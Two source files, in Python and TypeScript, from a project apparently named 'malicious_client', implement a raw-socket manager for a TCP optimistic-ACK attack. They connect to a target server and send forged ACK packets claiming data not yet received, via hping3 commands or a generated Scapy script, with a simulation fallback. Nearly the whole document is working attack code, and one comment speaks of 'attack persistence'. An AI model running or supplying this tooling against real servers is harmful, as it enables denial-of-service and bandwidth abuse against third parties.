File: malicious_client/src/raw_socket_manager.py
import socket
import random
import threading
import sys
import platform
import subprocess
import time

class RawSocketManager:
    def __init__(self):
        self.raw_socket = None
        self.connections = {}
        self.is_initialized = False
        self.local_ip = ''
        self.local_port = 0
        # Initialization is not immediate; must call initialize()

    def initialize(self):
        if self.is_initialized:
            return
        print('🔧 Initializing raw socket manager...')
        # Get local IP first
        self.local_ip = self.get_local_ip()
        self.local_port = random.randint(20000, 50000)
        try:
            # Try to create raw socket (requires privileges)
            try:
                self.raw_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
                self.raw_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
                print('✅ Raw socket created successfully')
            except Exception as socket_error:
                print('⚠️  Raw socket creation failed (expected without root):', socket_error)
                self.raw_socket = None
            self.is_initialized = True
            print(f'🔧 Raw socket manager initialized (Local: {self.local_ip}:{self.local_port})')
            if not self.raw_socket:
                print('💡 Operating in socket manipulation mode (no raw sockets)')
            else:
                print('⚠️  Raw packet injection available (requires root for full functionality)')
        except Exception as error:
            print('❌ Failed to initialize socket manager:', error)
            self.is_initialized = True  # Set to true anyway to allow simulation mode

    def get_local_ip(self):
        try:
            # Get outbound interface IP by connecting to a public IP (won't actually send)
            s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
            s.connect(('8.8.8.8', 80))
            ip = s.getsockname()[0]
            s.close()
            return ip
        except Exception:
            return '127.0.0.1'

    def send_packet(self, packet):
        if not self.is_initialized:
            raise Exception('Socket manager not initialized. Call initialize() first.')

        try:
            # Try to send real raw TCP packet
            if self.send_raw_tcp_packet(packet):
                return
            # Fallback to socket manipulation
            if self.send_via_socket_manipulation(packet):
                return
            # Last resort - simulate packet effects
            self.simulate_optimistic_ack(packet)
        except Exception as error:
            print('Packet sending failed, using simulation:', error)
            self.simulate_optimistic_ack(packet)

    def send_raw_tcp_packet(self, packet):
        try:
            system = platform.system().lower()
            if system == 'linux':
                return self.send_linux_raw_packet(packet)
            elif system == 'windows':
                return self.send_windows_raw_packet(packet)
            elif system == 'darwin':
                return self.send_macos_raw_packet(packet)
            return False
        except Exception as error:
            print('Raw packet sending failed:', error)
            return False

    def send_linux_raw_packet(self, packet):
        try:
            # Check if hping3 is available
            if subprocess.call(['which', 'hping3'], stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL) != 0:
                print('📦 hping3 not found, trying Python scapy...')
                return self.send_via_python(packet)
            command = [
                'timeout', '5', 'hping3', '-c', '1', '-A',
                '-p', str(packet['dest_port']),
                '-s', str(packet['source_port']),
                '-M', str(packet['ack_number']),
                '-w', str(packet['window_size']),
                packet['dest_ip']
            ]
            result = subprocess.run(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE, text=True)
            if 'Operation not permitted' not in result.stderr:
                return True
            else:
                print('🔒 hping3 requires root privileges, falling back...')
                return False
        except Exception:
            return self.send_via_python(packet)

    def send_via_python(self, packet):
        # Attempts to use scapy if available
        scapy_script = f"""
import sys
try:
    from scapy.all import *
    import os
    if os.geteuid() != 0:
        print("NEED_ROOT")
        sys.exit(1)
    ip = IP(src="{packet['source_ip']}", dst="{packet['dest_ip']}")
    tcp = TCP(sport={packet['source_port']}, dport={packet['dest_port']},
              flags="A", seq={packet['sequence_number']}, ack={packet['ack_number']},
              window={packet['window_size']})
    pkt = ip/tcp
    send(pkt, verbose=0)
    print("SUCCESS")
except ImportError:
    print("SCAPY_NOT_FOUND")
except Exception as e:
    print(f"ERROR: {{e}}")
"""
        proc = subprocess.Popen(
            ['python3', '-c', scapy_script],
            stdout=subprocess.PIPE, stderr=subprocess.PIPE, text=True
        )
        out, err = proc.communicate()
        if "SUCCESS" in out:
            print(f'🐍 Raw TCP packet sent via Scapy: ACK={packet["ack_number"]}')
            return True
        elif "NEED_ROOT" in out:
            print('🔒 Python scapy requires root privileges')
            return False
        elif "SCAPY_NOT_FOUND" in out:
            print('📦 Python scapy not installed')
            return False
        return False

    def send_windows_raw_packet(self, packet):
        print('💻 Windows raw packet injection not implemented yet')
        return False

    def send_macos_raw_packet(self, packet):
        return self.send_linux_raw_packet(packet)

    def send_via_socket_manipulation(self, packet):
        try:
            connection_key = f"{packet['dest_ip']}:{packet['dest_port']}"
            sock = self.connections.get(connection_key)
            if not sock or getattr(sock, 'closed', False):
                print(f"🔌 Socket manipulation: Would send ACK via existing connection")
                return True
            if sock:
                print(f"🔌 Socket manipulation: Simulated ACK behavior (ACK={packet['ack_number']})")
                return True
            return False
        except Exception:
            return False

    def simulate_optimistic_ack(self, packet):
        print(f"📦 OPTIMISTIC ACK PACKET (Simulated - no root access):")
        print(f"├─ {packet['source_ip']}:{packet['source_port']} → {packet['dest_ip']}:{packet['dest_port']}")
        print(f"├─ SEQ: {packet['sequence_number']} | ACK: {packet['ack_number']} (OPTIMISTIC +{packet['ack_number']})")
        print(f"├─ Window: {packet['window_size']} bytes")
        print(f"├─ Flags: ACK")
        print(f"└─ Effect: Would make server think client received {packet['ack_number']} bytes")

    def establish_connection(self, target_ip, target_port):
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.setsockopt(socket.SOL_SOCKET, socket.SO_KEEPALIVE, 1)
        sock.settimeout(10)
        try:
            sock.connect((target_ip, target_port))
            print(f"🔗 TCP connection established to {target_ip}:{target_port}")
            self.local_ip, self.local_port = sock.getsockname()
            connection_key = f"{target_ip}:{target_port}"
            self.connections[connection_key] = sock
            return sock
        except Exception as error:
            print(f"❌ Connection error: {error}")
            sock.close()
            return None

    def get_local_endpoint(self):
        return {'ip': self.local_ip, 'port': self.local_port}

    def is_ready(self):
        return self.is_initialized

    def close(self):
        for key, sock in self.connections.items():
            try:
                sock.close()
                print(f"🔌 Closed connection to {key}")
            except Exception:
                pass
        self.connections.clear()
        if self.raw_socket:
            self.raw_socket.close()
            self.raw_socket = None
        self.is_initialized = False
        print("🛑 Raw socket manager closed")

# Note: You'd replace the packet dicts with a suitable dataclass or dict.

File: malicious_client/src/RawSocketManager.ts
import * as dgram from 'dgram';
import * as net from 'net';
import { TCPPacket } from './PacketCrafter';

export class RawSocketManager {
  private rawSocket: dgram.Socket | null = null;
  private connections: Map<string, net.Socket> = new Map();
  private isInitialized: boolean = false;
  private initializationPromise: Promise<void> | null = null;
  private localIP: string = '';
  private localPort: number = 0;

  constructor() {
    // Don't initialize immediately - wait for explicit init call
  }

  public async initialize(): Promise<void> {
    if (this.initializationPromise) {
      return this.initializationPromise;
    }

    this.initializationPromise = this.initializeRawSocket();
    return this.initializationPromise;
  }

  private async initializeRawSocket(): Promise<void> {
    try {
      console.log('🔧 Initializing raw socket manager...');
      
      // Get local IP first
      this.localIP = await this.getLocalIP();
      this.localPort = Math.floor(Math.random() * 30000) + 20000;
      
      // Try to create raw socket (requires privileges)
      try {
        this.rawSocket = dgram.createSocket({ type: 'udp4', reuseAddr: true });
        console.log('✅ Raw socket created successfully');
      } catch (socketError) {
        console.warn('⚠️  Raw socket creation failed (expected without root):', socketError);
        this.rawSocket = null;
      }
      
      this.isInitialized = true;
      console.log(`🔧 Raw socket manager initialized (Local: ${this.localIP}:${this.localPort})`);
      
      if (!this.rawSocket) {
        console.log('💡 Operating in socket manipulation mode (no raw sockets)');
      } else {
        console.log('⚠️  Raw packet injection available (requires root for full functionality)');
      }
      
    } catch (error) {
      console.error('❌ Failed to initialize socket manager:', error);
      this.isInitialized = true; // Set to true anyway to allow simulation mode
      throw error;
    }
  }

  private async getLocalIP(): Promise<string> {
    return new Promise((resolve) => {
      const socket = new net.Socket();
      socket.connect(80, '8.8.8.8', () => {
        const localIP = socket.localAddress || '127.0.0.1';
        socket.destroy();
        resolve(localIP);
      });
      socket.on('error', () => {
        resolve('127.0.0.1');
      });
      
      // Timeout after 3 seconds
      setTimeout(() => {
        socket.destroy();
        resolve('127.0.0.1');
      }, 3000);
    });
  }

  public async sendPacket(packet: TCPPacket): Promise<void> {
    if (!this.isInitialized) {
      throw new Error('Socket manager not initialized. Call initialize() first.');
    }

    try {
      // Method 1: Try to send real raw TCP packet (if we have privileges)
      if (await this.sendRawTCPPacket(packet)) {
        return;
      }

      // Method 2: Fallback to socket manipulation
      if (await this.sendViaSocketManipulation(packet)) {
        return;
      }

      // Method 3: Last resort - simulate packet effects
      this.simulateOptimisticACK(packet);

    } catch (error) {
      console.warn('Packet sending failed, using simulation:',error);
      this.simulateOptimisticACK(packet);
    }
  }

  private async sendRawTCPPacket(packet: TCPPacket): Promise<boolean> {
    try {
      // Check if we have the necessary tools installed
      if (process.platform === 'linux') {
        return await this.sendLinuxRawPacket(packet);
      } else if (process.platform === 'win32') {
        return await this.sendWindowsRawPacket(packet);
      } else if (process.platform === 'darwin') {
        return await this.sendMacOSRawPacket(packet);
      }
      return false;
    } catch (error) {
      console.warn('Raw packet sending failed:', error);
      return false;
    }
  }

  private async sendLinuxRawPacket(packet: TCPPacket): Promise<boolean> {
    try {
      const { exec } = require('child_process');
      const { promisify } = require('util');
      const execAsync = promisify(exec);

      // Check if hping3 is available
      try {
        await execAsync('which hping3');
      } catch {
        console.log('📦 hping3 not found, trying Python scapy...');
        return await this.sendViaPython(packet);
      }

      // Use hping3 for raw TCP packet injection
      const command = `timeout 5 hping3 -c 1 -A -p ${packet.destPort} ` +
                     `-s ${packet.sourcePort} -M ${packet.ackNumber} ` +
                     `-w ${packet.windowSize} ${packet.destIP} 2>/dev/null`;

      const { stdout, stderr } = await execAsync(command);
      
      if (!stderr.includes('Operation not permitted')) {
        //console.log(`📡 Raw TCP packet sent via hping3: ACK=${packet.ackNumber}`);
        return true;
      } else {
        console.log('🔒 hping3 requires root privileges, falling back...');
        return false;
      }
    } catch (error) {
      // Try alternative method using scapy if available
      return await this.sendViaPython(packet);
    }
  }

  private async sendViaPython(packet: TCPPacket): Promise<boolean> {
    try {
      const { exec } = require('child_process');
      const { promisify } = require('util');
      const execAsync = promisify(exec);

      // Create Python script for packet injection
      const pythonScript = `
import sys
try:
    from scapy.all import *
    import os
    
    # Check if we have privileges
    if os.geteuid() != 0:
        print("NEED_ROOT")
        sys.exit(1)
    
    # Create TCP packet with optimistic ACK
    ip = IP(src="${packet.sourceIP}", dst="${packet.destIP}")
    tcp = TCP(sport=${packet.sourcePort}, dport=${packet.destPort}, 
             flags="A", seq=${packet.sequenceNumber}, ack=${packet.ackNumber},
             window=${packet.windowSize})
    
    packet = ip/tcp
    send(packet, verbose=0)
    print("SUCCESS")
except ImportError:
    print("SCAPY_NOT_FOUND")
except Exception as e:
    print(f"ERROR: {e}")
`;

      const { stdout, stderr } = await execAsync(`python3 -c "${pythonScript}"`);
      
      if (stdout.includes('SUCCESS')) {
        console.log(`🐍 Raw TCP packet sent via Scapy: ACK=${packet.ackNumber}`);
        return true;
      } else if (stdout.includes('NEED_ROOT')) {
        console.log('🔒 Python scapy requires root privileges');
        return false;
      } else if (stdout.includes('SCAPY_NOT_FOUND')) {
        console.log('📦 Python scapy not installed');
        return false;
      }
      
      return false;
    } catch (error) {
      return false;
    }
  }

  private async sendWindowsRawPacket(packet: TCPPacket): Promise<boolean> {
    // Windows implementation would go here
    console.log('💻 Windows raw packet injection not implemented yet');
    return false;
  }

  private async sendMacOSRawPacket(packet: TCPPacket): Promise<boolean> {
    // Similar to Linux but may have different requirements
    return await this.sendLinuxRawPacket(packet);
  }

  private async sendViaSocketManipulation(packet: TCPPacket): Promise<boolean> {
    try {
      const connectionKey = `${packet.destIP}:${packet.destPort}`;
      let socket = this.connections.get(connectionKey);

      if (!socket || socket.destroyed) {
        // Don't create new connections here - just log that we would
        console.log(`🔌 Socket manipulation: Would send ACK via existing connection`);
        return true;
      }

      // If we have an active socket, we can try to influence its behavior
      if (socket && socket.writable) {
        // This is a simplified approach - in reality, we'd need to manipulate socket buffers
        console.log(`🔌 Socket manipulation: Simulated ACK behavior (ACK=${packet.ackNumber})`);
        return true;
      }

      return false;
    } catch (error) {
      return false;
    }
  }

  private simulateOptimisticACK(packet: TCPPacket): void {
    // Enhanced simulation that logs realistic packet details
    console.log(`📦 OPTIMISTIC ACK PACKET (Simulated - no root access):`);
    console.log(`├─ ${packet.sourceIP}:${packet.sourcePort} → ${packet.destIP}:${packet.destPort}`);
    console.log(`├─ SEQ: ${packet.sequenceNumber} | ACK: ${packet.ackNumber} (OPTIMISTIC +${packet.ackNumber})`);
    console.log(`├─ Window: ${packet.windowSize} bytes`);
    console.log(`├─ Flags: ACK`);
    console.log(`└─ Effect: Would make server think client received ${packet.ackNumber} bytes`);
  }

  public async establishConnection(targetIP: string, targetPort: number): Promise<net.Socket> {
    return new Promise((resolve, reject) => {
      const socket = new net.Socket();
      
      // Enable keep-alive for better attack persistence
      socket.setKeepAlive(true, 1000);
      
      socket.connect(targetPort, targetIP, () => {
        console.log(`🔗 TCP connection established to ${targetIP}:${targetPort}`);
        
        // Store connection details for packet crafting
        this.localIP = socket.localAddress || this.localIP;
        this.localPort = socket.localPort || this.localPort;
        
        // Store connection for potential socket manipulation
        const connectionKey = `${targetIP}:${targetPort}`;
        this.connections.set(connectionKey, socket);
        
        resolve(socket);
      });

      socket.on('error', (error) => {
        console.error('❌ Connection error:', error.message);
        reject(error);
      });

      socket.on('close', () => {
        console.log(`🔌 Connection to ${targetIP}:${targetPort} closed`);
        const connectionKey = `${targetIP}:${targetPort}`;
        this.connections.delete(connectionKey);
      });

      // Set connection timeout
      socket.setTimeout(10000, () => {
        socket.destroy();
        reject(new Error('Connection timeout'));
      });
    });
  }

  public getLocalEndpoint(): { ip: string; port: number } {
    return { ip: this.localIP, port: this.localPort };
  }

  public isReady(): boolean {
    return this.isInitialized;
  }

  public close(): void {
    this.connections.forEach((socket, key) => {
      if (!socket.destroyed) {
        socket.destroy();
        console.log(`🔌 Closed connection to ${key}`);
      }
    });
    this.connections.clear();
    
    if (this.rawSocket) {
      this.rawSocket.close();
      this.rawSocket = null;
    }
    
    this.isInitialized = false;
    console.log('🛑 Raw socket manager closed');
  }
}